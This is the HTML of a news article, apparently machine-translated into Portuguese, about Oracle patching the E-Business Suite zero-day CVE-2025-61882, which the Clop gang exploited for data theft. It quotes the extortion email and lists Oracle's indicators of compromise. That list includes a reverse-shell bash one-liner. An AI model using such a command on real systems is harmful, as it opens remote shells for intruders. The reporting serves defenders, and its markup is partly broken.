Código HTML do Conteúdo
Post: Oracle corrige EBS de dia zero explorado em ataques de roubo de dados Clop
<div>
<div>
<p>A Oracle está alertando sobre uma vulnerabilidade crítica de dia zero do E-Business Suite rastreada como CVE-2025-61882 que permite que invasores executem execução remota de código não autenticada, com a falha ativamente explorada em ataques de roubo de dados Clop.</p>
<p>A falha está no produto Oracle Concurrent Processing do Oracle E-Business Suite (componente: BI Publisher Integration) e tem uma pontuação básica CVSS de 9,8, devido à falta de autenticação e facilidade de exploração.</p>
<p>“Este alerta de segurança aborda a vulnerabilidade CVE-2025-61882 no Oracle E-Business Suite”, diz um novo comunicado da Oracle.</p>
<p>“Essa vulnerabilidade é explorável remotamente sem autenticação, ou seja, pode ser explorada em uma rede sem a necessidade de um nome de usuário e senha. Se explorada com sucesso, essa vulnerabilidade pode resultar na execução remota de código.”</p>
<p>A Oracle confirmou que a vulnerabilidade de dia zero afeta o Oracle E-Business Suite, versões 12.2.3-12.2.14, e lançou um <a href="https://support.oracle.com/rs?type=doc&id=3106344.1" rel="nofollow noopener" target="_blank">Atualização de emergência</a> para resolver a falha. A empresa observa que os clientes devem primeiro instalar a atualização crítica de patch de outubro de 2023 antes de poderem instalar as novas atualizações de segurança.</p>
<h2>Dia zero explorado em ataques de roubo de dados do Clop</h2>
<p>Embora a Oracle não tenha declarado explicitamente que esta é uma vulnerabilidade de dia zero, eles compartilharam indicadores de comprometimento que correspondem a uma exploração do Oracle EBS recentemente compartilhada por agentes de ameaças no Telegram.</p>
<p>Charles Carmakal, CTO, Mandiant – Google Cloud, também confirmou que essa foi a falha explorada pela gangue de ransomware Clop em ataques de roubo de dados ocorridos em agosto de 2025.</p>
<p>“O Clop explorou várias vulnerabilidades no Oracle EBS, o que lhes permitiu roubar grandes quantidades de dados de várias vítimas em agosto de 2025”, compartilhou Carmakal em um comunicado ao BleepingComputer.</p>
<p>“Várias vulnerabilidades foram exploradas, incluindo vulnerabilidades que foram corrigidas na atualização de julho de 2025 da Oracle, bem como uma que foi corrigida neste fim de semana (CVE-2025-61882)”, continuou Carmakal.</p>
<p>CVE-2025-61882 é uma vulnerabilidade crítica (9.8 CVSS) que permite a execução remota de código não autenticado.</p>
<p>As notícias da última campanha de extorsão de Clop surgiram pela primeira vez na semana passada, quando a Mandiant e o Google Threat Intelligence Group (GTIG) relataram que estavam <a href="https://www.bleepingcomputer.com/news/security/clop-extortion-emails-claim-theft-of-oracle-e-business-suite-data/" rel="nofollow noopener" target="_blank">Acompanhar uma nova campanha</a> em que várias empresas receberam e-mails alegando ser dos agentes da ameaça.</p>
<p>Esses e-mails afirmavam que Clop havia roubado dados dos sistemas Oracle E-Business Suite da empresa e exigia um resgate para não vazar os dados roubados.</p>
<p>“Somos uma equipe CL0P. Se você ainda não ouviu falar de nós, pode pesquisar sobre nós no Google na internet”, diz o e-mail de extorsão compartilhado com o BleepingComputer.</p>
<p>“Recentemente, violamos seu aplicativo Oracle E-Business Suite e copiamos muitos documentos. Todos os arquivos privados e outras informações agora são mantidos em nossos sistemas.”</p>
<div>
<p><img decoding="async" alt="E-mail de extorsão do Clop" height="600" src="https://datalake.azaeo.com/wp-content/uploads/2025/10/clop-oracle-extortion-email.jpg" width="695 /></div>
<p>The Clop extortion gang has a long history of exploiting zero-day vulnerability in massive data theft attacks, which include:</p>
<ul><li><strong>2020:</strong>Exploiting a<a href=">dia zero na plataforma Accellion FTA, afetando quase 100 organizações.
</p>
<li><strong>2021:</strong>Explorar um<a href="https://www.bleepingcomputer.com/news/security/clop-gang-exploiting-solarwinds-serv-u-flaw-in-ransomware-attacks/" rel="nofollow noopener" target="_blank">dia zero no SolarWinds Serv-U FTP</a>software.</li>
<li><strong>2023:</strong>Explorar um<a href="https://www.bleepingcomputer.com/news/security/fortra-shares-findings-on-goanywhere-mft-zero-day-attacks/" rel="nofollow noopener" target="_blank">dia zero na plataforma GoAnywhere MFT</a>, violando mais de 100 empresas.</li>
<li><strong>2023:</strong>Explorar um<a href="https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-moveit-extortion-attacks/" rel="nofollow noopener" target="_blank">dia zero no MOVEit Transfer</a>foi a campanha mais extensa de Clop até hoje, onde uma exploração de dia zero permitiu<a href="https://www.emsisoft.com/en/blog/44123/unpacking-the-moveit-breach-statistics-and-analysis/" rel="nofollow noopener" target="_blank">Roubo de dados de 2.773 organizações em todo o mundo</a>.</li>
<li><strong>2024:</strong> Explorado <a href="https://www.bleepingcomputer.com/news/security/clop-ransomware-claims-responsibility-for-cleo-data-theft-attacks/" rel="nofollow noopener" target="_blank">dois Cleo transferência de arquivos de dia zero (CVE-2024-50623 e CVE-2024-55956)</a> para roubar dados e extorquir empresas.</li>
<p>Clop confirmou mais tarde ao BleepingComputer que eles estavam por trás dos e-mails de extorsão e indicaram que exploraram uma vulnerabilidade de dia zero da Oracle para roubar os dados.</p>
<p>“Em breve, tudo ficará óbvio que a Oracle grampeou seu produto principal e, mais uma vez, a tarefa está em clop para salvar o dia”, disse Clop ao BleepingComputer, indicando que uma nova falha foi explorada.</p>
<p>Contudo <a href="https://www.bleepingcomputer.com/news/security/oracle-links-clop-extortion-attacks-to-july-security-flaws/" rel="nofollow noopener" target="_blank">A Oracle inicialmente vinculou a campanha de extorsão do Clop</a> para vulnerabilidades que foram corrigidas em julho de 2025, em vez do novo dia zero que agora sabemos que foi usado nos ataques.</p>
<p>A Oracle agora compartilhou indicadores de comprometimento para a exploração de dia zero, que incluem dois endereços IP vistos explorando servidores, um comando para abrir um shell remoto e o arquivo de exploração e arquivos associados.</p>
<ul>
<li>200[.]107[.]207[.]26 – Endereço IP associado à exploração observada. (Solicitações HTTP GET e POST)</li>
<li>185[.]181[.]60[.]11 – Endereço IP associado à exploração observada. (Solicitações HTTP GET e POST)</li>
<li>sh -c /bin/bash -i >& /dev/tcp//0>&1 – Comando executado por exploit para abrir um shell reverso.</li>
<li><a href="http://www.virustotal.com/gui/file/76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d" rel="nofollow noopener" target="_blank">76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d</a> – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (arquivo de exploração)</li>
<li><a href="http://www.virustotal.com/gui/file/aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121" rel="nofollow noopener" target="_blank">aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121</a> – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py (Parte do exploit)</li>
<li><a href="http://www.virustotal.com/gui/file/6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b" rel="nofollow noopener" target="_blank">6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b</a> – oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py (Parte do exploit)</li>
</ul>
<h2>Exploitvazado por Caçadores de Lapsus$ Dispersos</h2>
<p>Embora o Clop esteja por trás dos ataques de roubo de dados e exploração do dia zero da Oracle, as notícias do dia zero vieram primeiro de um grupo diferente de agentes de ameaças que foram <a href="https://www.bleepingcomputer.com/tag/shinyhunters/" rel="nofollow noopener" target="_blank">fazendo suas próprias manchetes</a> ultimamente com sua ampla<a href="https://www.bleepingcomputer.com/news/security/shinyhunters-starts-leaking-data-stolen-in-salesforce-attacks/" rel="nofollow noopener" target="_blank">ataques de roubo de dados a clientes do Salesforce</a>.</p>
<p>Na sexta-feira, esses atores, que se autodenominam “Scattered Lapsus$ Hunters”, pois afirmam consistir em agentes de ameaças de Scattered Spider, Lapsus$ e ShinyHunters, vazaram dois arquivos no Telegram que disseram estar relacionados aos ataques do Clop.</p>
<p>Um arquivo chamado “GIFT_FROM_CL0P.7z” contém o código-fonte da Oracle que parece estar relacionado a “support.oracle.com” com base nos nomes dos arquivos.</p>
<p>No entanto, os agentes da ameaça também lançaram um arquivo “ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip”, que eles insinuaram pelo nome do arquivo como o exploit Oracle E-Business usado por Clop.</p>
<div>
<p><img decoding="async" alt="Exploração do Oracle E-Business para falha de dia zero" height="283" src="https://datalake.azaeo.com/wp-content/uploads/2025/10/oracle-e-business-exploit-leak.jpg" width="741 /></div>
<p>BleepingComputer has confirmed this is the same file listed in Oracle's indicators of compromise.</p>
<p>This archives contains a readme.md instructionfileand two Python scripts namedexp.py andserver.py. These Python scripts are used to exploit a vulnerable Oracle E-Business Suite instance and either execute an arbitrary command or open a reverse shell back to the threat actor's servers.</p>
<p>As the IOCs shared by Oracle list the name of the exploit archive shared byScattered Lapsus$ Hunters, it is now confirmed that this is the exploitused by the Clop ransomware gang.</p>
<p>However, it does raise questions on how theScattered Lapsus$ Hunters threat actors gained access to the exploit and whether they are working with Clop in some capacity.</p>
<p>BleepingComputer contacted representatives from both ShinyHunters and Clop to ask questions about this relationship, but has not received a response at this time.</p>
<style>
.ia_ad {
background-color: #f0f6ff;
width: 95%;
max-width: 800px;
margin: 15px auto;
border-radius: 8px;
border: 1px solid #d6ddee;
display: flex;
align-items: stretch;
padding: 0;
overflow: hidden;
}
.ia_lef {
flex: 1;
max-width: 200px;
height: auto;
display: flex;
align-items: stretch;
}
.ia_lef a {
display: flex;
width: 100%;
height: 100%;
}
.ia_lef a img {
width: 100%;
height: 100%;
object-fit: cover;
border-radius: 8px 0 0 8px;
margin: 0;
display: block;
}
.ia_rig {
flex: 2;
padding: 10px;
display: flex;
flex-direction: column;
justify-content: center;
}
.ia_rig h2 {
font-size: 17px !important;
font-weight: 700;
color: #333;
line-height: 1.4;
font-family: Georgia, "></p>
<div>
<div>
<h2><a href="https://hubs.li/Q03LvVKm0" rel="noopener sponsored" target="_blank">O Evento de Validação de Segurança do Ano: O Picus BAS Summit </a></h2>
<p>Junte-se ao <strong>Cúpula de Simulação de Violação e Ataque</strong> e experimente o <strong>Futuro da validação de segurança</strong>. Ouça os principais especialistas e veja como <strong>BAS alimentado por IA</strong> está transformando a simulação de violação e ataque.</p>
<p>Não perca o evento que moldará o futuro da sua estratégia de segurança</p>
</div>
</div>
</div>
</div>
<div>
<div>
<h5><a href="https://www.bleepingcomputer.com/author/lawrence-abrams/" target="_blank">Lawrence Abrams</a> <span> <a aria-label="Email lawrence.abrams@bleepingcomputer.com" href="https://www.bleepingcomputer.com/news/security/oracle-patches-ebs-zero-day-exploited-in-clop-data-theft-attacks/mailto:lawrence.abrams@bleepingcomputer.com" target="_blank"><i aria-hidden="true" title="Email lawrence.abrams@bleepingcomputer.com"></i></a> <a aria-label="Open Author's twitter page" href="https://twitter.com/LawrenceAbrams" rel="noopener" target="_blank"><i aria-hidden="true" title="Open Author's twitter page"></i></a></span></h5>
<p> Lawrence Abrams é o proprietário e editor-chefe da BleepingComputer.com. A área de especialização de Lawrence inclui Windows, remoção de malware e computação forense. Lawrence Abrams é coautor do Guia de campo de desfragmentação, recuperação e administração do Winternals e editor técnico do Rootkits for Dummies.
</p>
</div>
</div>
<h3>Você também pode gostar:</h3>
</div></div>